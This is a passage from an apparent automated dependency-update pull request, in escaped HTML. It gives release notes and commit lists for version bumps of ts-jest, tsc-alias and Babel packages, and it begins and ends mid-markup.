v30.4.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jestjs/jest/commits/v30.4.1/packages/jest-environment-jsdom\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ts-jest` from 29.4.9 to 29.4.11\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kulshekhar/ts-jest/releases\"\u003ets-jest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev29.4.11\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/kulshekhar/ts-jest/blob/main/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev29.4.10\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/kulshekhar/ts-jest/blob/main/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kulshekhar/ts-jest/blob/main/CHANGELOG.md\"\u003ets-jest's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/compare/v29.4.10...v29.4.11\"\u003e29.4.11\u003c/a\u003e (2026-05-21)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve Bundler on the CJS path under TypeScript \u0026gt;= 6 (\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/39418187515f11b6584d35a4e3ddf50231f74936\"\u003e3941818\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/kulshekhar/ts-jest/issues/4198\"\u003e#4198\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/compare/v29.4.9...v29.4.10\"\u003e29.4.10\u003c/a\u003e (2026-05-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epass \u003ccode\u003eresolutionMode\u003c/code\u003e to \u003ccode\u003ets.resolveModuleName\u003c/code\u003e for hybrid module support (\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/b557a85f85c3fd34523ec3a15293afbdc9dea83c\"\u003eb557a85\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erebuild \u003ccode\u003eProgram\u003c/code\u003e when consecutive compiles need different module kinds (\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/a82a2b32c4987a5249fd5284283117dd2fa3be47\"\u003ea82a2b3\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/kulshekhar/ts-jest/issues/4774\"\u003e#4774\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erespect tsconfig \u003ccode\u003emoduleResolution\u003c/code\u003e instead of forcing \u003ccode\u003eNode10\u003c/code\u003e (\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/1bffffc667557c173ae0c1f93dd436920775dac4\"\u003e1bffffc\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransformer:\u003c/strong\u003e transpile \u003ccode\u003emjs\u003c/code\u003e files from \u003ccode\u003enode_modules\u003c/code\u003e for CJS mode (\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/96d025dd912ea2bceb18b67d2d509ada7a756d9d\"\u003e96d025d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransformer:\u003c/strong\u003e use a consistent comparator in hoist-jest sortStatements (\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/8a8fd2fb8446655bba18367db9306a1089490e62\"\u003e8a8fd2f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/bff2d64917caa8150701829b152c4d193614d997\"\u003e\u003ccode\u003ebff2d64\u003c/code\u003e\u003c/a\u003e chore(release): 29.4.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/39418187515f11b6584d35a4e3ddf50231f74936\"\u003e\u003ccode\u003e3941818\u003c/code\u003e\u003c/a\u003e fix: preserve Bundler on the CJS path under TypeScript \u0026gt;= 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/efb3c2f84d3583db0787982a18425d99edadfe25\"\u003e\u003ccode\u003eefb3c2f\u003c/code\u003e\u003c/a\u003e build(deps): bump webpack-dev-server from 5.2.2 to 5.2.4 in /website\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/4e46fad6c1c4d5be5d6666c64bf65a3af2f1519e\"\u003e\u003ccode\u003e4e46fad\u003c/code\u003e\u003c/a\u003e ci: refactor release workflow\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/96b3ac0cc0586d5379c87308f797a9acf0e4a675\"\u003e\u003ccode\u003e96b3ac0\u003c/code\u003e\u003c/a\u003e chore(release): 29.4.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/e98ec6452548a61285d55c00c7f6b1fd9858d699\"\u003e\u003ccode\u003ee98ec64\u003c/code\u003e\u003c/a\u003e build(deps): update github/codeql-action digest to 458d36d\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/21ac58f60f93164640433250fb4ca8b671aa8587\"\u003e\u003ccode\u003e21ac58f\u003c/code\u003e\u003c/a\u003e build(deps): update jest packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/0fdc96d293c6ce047bf61831b721218623882e78\"\u003e\u003ccode\u003e0fdc96d\u003c/code\u003e\u003c/a\u003e build(deps): update dependency semver to ^7.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/4b95551190235a65eac176625c72e220af066efe\"\u003e\u003ccode\u003e4b95551\u003c/code\u003e\u003c/a\u003e build(deps): update dependency jest-environment-jsdom to ^30.4.1 (\u003ca href=\"https://redirect.github.com/kulshekhar/ts-jest/issues/5311\"\u003e#5311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kulshekhar/ts-jest/commit/7b884476f7891e2b9a8637e2f6bb2e09b7efcfbd\"\u003e\u003ccode\u003e7b88447\u003c/code\u003e\u003c/a\u003e build(deps): update eslint packages to ^8.59.3 (\u003ca href=\"https://redirect.github.com/kulshekhar/ts-jest/issues/5310\"\u003e#5310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kulshekhar/ts-jest/compare/v29.4.9...v29.4.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tsc-alias` from 1.8.16 to 1.8.17\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/justkey007/tsc-alias/releases\"\u003etsc-alias's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.8.17 (2025-04-30)\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eminor typo in README.md by \u003ca href=\"https://github.com/danielrentz\"\u003e\u003ccode\u003e@​danielrentz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/pull/249\"\u003ejustkey007/tsc-alias#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCI by \u003ca href=\"https://github.com/justkey007\"\u003e\u003ccode\u003e@​justkey007\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/pull/258\"\u003ejustkey007/tsc-alias#258\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump minimatch from 10.0.1 to 10.2.5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/pull/257\"\u003ejustkey007/tsc-alias#257\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/danielrentz\"\u003e\u003ccode\u003e@​danielrentz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/pull/249\"\u003ejustkey007/tsc-alias#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/pull/257\"\u003ejustkey007/tsc-alias#257\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/justkey007/tsc-alias/compare/v1.8.16...v1.8.17\"\u003ehttps://github.com/justkey007/tsc-alias/compare/v1.8.16...v1.8.17\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/d51d3e602a2ad8d794361d69c0974b83eb510e6d\"\u003e\u003ccode\u003ed51d3e6\u003c/code\u003e\u003c/a\u003e 1.8.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/0b1a9064f5b63bc9720e191565f2487e4c31e067\"\u003e\u003ccode\u003e0b1a906\u003c/code\u003e\u003c/a\u003e test: increase timeout for prepareSingleFileReplaceTscAliasPaths test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/318b473f07c782d8fc62cbf39914bd8b2e745277\"\u003e\u003ccode\u003e318b473\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/issues/257\"\u003e#257\u003c/a\u003e from justkey007/dependabot/npm_and_yarn/minimatch-10.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/0f67a39aae9a8414afeb9b4964751b5f4ad2554f\"\u003e\u003ccode\u003e0f67a39\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/justkey007/tsc-alias/issues/258\"\u003e#258\u003c/a\u003e from justkey007/_ci\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/9aa53621a8cfd411928b0dca7bee062b640e4c88\"\u003e\u003ccode\u003e9aa5362\u003c/code\u003e\u003c/a\u003e test: fix prepareSingleFileReplaceTscAliasPaths test to use JS API instead of...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/f450e74822b679bfc6d326d7d7b3a69a556c95bc\"\u003e\u003ccode\u003ef450e74\u003c/code\u003e\u003c/a\u003e chore: update tsconfig.json files in project14 packages to include compiler o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/14aa685e65d99398ef66725115158f37e5c767f6\"\u003e\u003ccode\u003e14aa685\u003c/code\u003e\u003c/a\u003e chore: add \u0026quot;skipLibCheck\u0026quot; option to tsconfig.json files in project14 and proj...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/57d8c33a314505c135d09fd4503358a8cae51514\"\u003e\u003ccode\u003e57d8c33\u003c/code\u003e\u003c/a\u003e chore: add \u0026quot;skipLibCheck\u0026quot; option to tsconfig.json files across multiple projects\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/b8984a4c7b6ddfda5ce0886e00f5de2b62ae1bb2\"\u003e\u003ccode\u003eb8984a4\u003c/code\u003e\u003c/a\u003e chore: update Node.js and pnpm versions in CI workflow\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/justkey007/tsc-alias/commit/a435cd46e099399ffa3b0f81d342f4da177733f8\"\u003e\u003ccode\u003ea435cd4\u003c/code\u003e\u003c/a\u003e chore(deps): bump minimatch from 10.0.1 to 10.2.5\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/justkey007/tsc-alias/compare/v1.8.16...v1.8.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/core` from 7.29.0 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/04ea6b27fdac8f40c3481aec2080ac9678779509\"\u003e\u003ccode\u003e04ea6b2\u003c/code\u003e\u003c/a\u003e v7.29.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99f498a9b9fa0b900d603fbe8f6601bb3b9e42bb\"\u003e\u003ccode\u003e99f498a\u003c/code\u003e\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/18001\"\u003e#18001\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/feba0a3654c596bd369d1ef1231f5d56666d56dc\"\u003e\u003ccode\u003efeba0a3\u003c/code\u003e\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17998\"\u003e#17998\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-core\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-runtime` from 7.29.0 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-runtime's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-runtime/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 